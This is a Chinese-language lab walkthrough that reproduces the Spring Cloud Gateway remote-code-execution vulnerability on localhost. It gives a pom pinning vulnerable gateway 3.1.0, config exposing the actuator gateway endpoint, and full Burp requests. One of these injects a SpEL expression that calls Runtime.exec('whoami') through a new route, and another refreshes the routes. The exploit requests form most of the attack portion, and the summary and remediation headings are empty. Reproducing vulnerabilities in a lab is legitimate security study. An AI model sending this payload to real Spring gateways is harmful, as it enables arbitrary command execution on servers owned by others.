Spring Cloud Gateway RCE漏洞的IDEA复现

我们首先了解一些基础知识

spring cloud 微服务架构：

spring cloud gateway （网关服务）概念：

spring boot actuator（监控组件）:

actuator操作gateway接口列表

接下来开始复现：

首先我们先将pom依赖替换：

<?xml version="1.0" encoding="utf-8"?>
<project xmlns="http://maven.apache.org/pom/4.0.0" xmlns:xsi="http://www.w3.org/2001/xmlschema-instance"
	xsi:schemalocation="http://maven.apache.org/pom/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelversion>4.0.0</modelversion>
	<parent>
		<groupid>org.springframework.boot</groupid>
		<artifactid>spring-boot-starter-parent</artifactid>
		<version>2.6.3-snapshot</version>
		<relativepath/> <!-- lookup parent from repository -->

	</parent>
	<groupid>com.wuya</groupid>
	<artifactid>spring-gateway-rce</artifactid>
	<version>0.0.1</version>
	<name>spring-gateway-rce</name>
	<description>spring gateway env for rce</description>
	<properties>
		<java.version>1.8</java.version>
		<spring-cloud.version>2021.0.1-snapshot</spring-cloud.version>
	</properties>
	<dependencies>
		<dependency>
			<groupid>org.springframework.cloud</groupid>
			<artifactid>spring-cloud-starter-gateway</artifactid>
		</dependency>

<!--		指定gateway server 版本-->
<!--		如果不指定，默认为 3.1.1-snapshot-->
		<dependency>
			<groupid>org.springframework.cloud</groupid>
			<artifactid>spring-cloud-gateway-server</artifactid>
			<version>3.1.0</version>
		</dependency>

		<dependency>
			<groupid>org.springframework.boot</groupid>
			<artifactid>spring-boot-starter</artifactid>
		</dependency>

		<dependency>
			<groupid>org.springframework.boot</groupid>
			<artifactid>spring-boot-starter-test</artifactid>
			<scope>test</scope>
		</dependency>

		<dependency>
		    <groupid>org.springframework.boot</groupid>
		    <artifactid>spring-boot-starter-actuator</artifactid>
		</dependency>
	</dependencies>
	<dependencymanagement>
		<dependencies>
			<dependency>
				<groupid>org.springframework.cloud</groupid>
				<artifactid>spring-cloud-dependencies</artifactid>
				<version>${spring-cloud.version}</version>
				<type>pom</type>
				<scope>import</scope>
			</dependency>
		</dependencies>
	</dependencymanagement>

	<build>
		<plugins>
			<plugin>
				<groupid>org.springframework.boot</groupid>
				<artifactid>spring-boot-maven-plugin</artifactid>
			</plugin>
		</plugins>
	</build>
	<repositories>
		<repository>
			<id>spring-milestones</id>
			<name>spring milestones</name>
			<url>https://repo.spring.io/milestone</url>
			<snapshots>
				<enabled>false</enabled>
			</snapshots>
		</repository>
		<repository>
			<id>spring-snapshots</id>
			<name>spring snapshots</name>
			<url>https://repo.spring.io/snapshot</url>
			<releases>
				<enabled>false</enabled>
			</releases>
		</repository>
	</repositories>
	<pluginrepositories>
		<pluginrepository>
			<id>spring-milestones</id>
			<name>spring milestones</name>
			<url>https://repo.spring.io/milestone</url>
			<snapshots>
				<enabled>false</enabled>
			</snapshots>
		</pluginrepository>
		<pluginrepository>
			<id>spring-snapshots</id>
			<name>spring snapshots</name>
			<url>https://repo.spring.io/snapshot</url>
			<releases>
				<enabled>false</enabled>
			</releases>
		</pluginrepository>
	</pluginrepositories>

</project>

依次写入application.properties、gatewayapptests.java、gatewayapp、：

spring.application.name=gateway-demo
server.port=9000
management.endpoint.gateway.enabled=true
management.endpoints.web.exposure.include=gateway

package wuya;

import org.junit.jupiter.api.test;
import org.springframework.boot.test.context.springboottest;

@springboottest
class gatewayapptests {

	@test
	void contextloads() {
	}

}

package wuya;

import org.springframework.boot.springapplication;
import org.springframework.boot.autoconfigure.springbootapplication;
import org.springframework.cloud.gateway.route.routelocator;
import org.springframework.cloud.gateway.route.builder.routelocatorbuilder;
import org.springframework.context.annotation.bean;
import org.springframework.web.bind.annotation.requestmapping;
import org.springframework.web.bind.annotation.restcontroller;

@springbootapplication
@restcontroller
public class gatewayapp {

	@requestmapping("/")
	public string root() {
		return "gateway up and running!";
	}

	@bean
	routelocator testroutelocator(routelocatorbuilder routelocatorbuilder) {
		return routelocatorbuilder.routes()
				.route("test", r -> r.path("/test/**").filters(f -> f.rewritepath("/test(?<path>.*)", "/${path}")).uri("https://www.baidu.com"))
				.route("get", r -> r.path("/get/**").filters(f -> f.addrequestheader("x-gateway-test", "foo")).uri("https://httpbin.org")).build();
	}

	public static void main(string[] args) {
		springapplication.run(gatewayapp.class, args);
	}

}

准备工作完成：我们直接启动服务gatewayapp.java

 因为本地测试，我们直接访问我们的本地的9000端口：

启动成功。

接着我们打开bp，找到repeater:

我们首先要添加路由：

成功

post /actuator/gateway/routes/hacktest http/1.1
host: localhost:9000
accept-encoding: gzip, deflate
accept: */*
accept-language: en
user-agent: mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/97.0.4692.71 safari/537.36
connection: close
content-type: application/json
content-length: 329

{
  "id": "6666",
  "filters": [{
    "name": "addresponseheader",
    "args": {
      "name": "result",
      "value": "#{new string(t(org.springframework.util.streamutils).copytobytearray(t(java.lang.runtime).getruntime().exec(new string[]{\"whoami\"}).getinputstream()))}"
    }
  }],
  "uri": "http://example.com"
}

第二步刷新路由：

成功

post /actuator/gateway/refresh http/1.1
host: localhost:9000
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-encoding: gzip, deflate
accept-language: zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3,en;q=0.2
connection: keep-alive
content-length: 3
content-type: application/x-www-form-urlencoded
origin: null
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: cross-site
upgrade-insecure-requests: 1
user-agent: mozilla/5.0 (windows nt 10.0; win64; x64; rv:97.0) gecko/20100101 firefox/97.0

a=1

最后一步，访问过滤器id：

最终我们执行成功的是我们的攻击语句，这是我们在添加路由中写入：

总结：

扫描和恢复：